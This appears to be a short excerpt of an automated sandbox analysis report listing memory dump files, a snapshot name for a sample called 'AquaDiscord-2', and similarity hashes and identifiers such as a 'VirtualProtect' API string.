                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909645953.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909632146.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909666742.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909681954.0000000000B20000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909698006.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909712695.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressProc
                                                                                          • String ID: @$VirtualProtect
                                                                                          • API String ID: 190572456-29487290
                                                                                          • Opcode ID: c9adf84e3e4c84680750698a7dc8328ddb376d3a1e6c06beb21b542d0cc0833b
                                                                                          • Instruction ID: 12efb434c298eb400047c9b64d168f8daab7e0939b6189faf2074abfbfd42242
                                                                                          • Opcode Fuzzy Hash: c9adf84e3e4c84680750698a7dc8328ddb376d3a1e6c06beb21b542d0cc0833b
                                                                                          • Instruction Fuzzy Hash: 2841E4B0901209DFDB04EFA9D5986EEBBF0FF08314F108419E858AB351D775A945CF91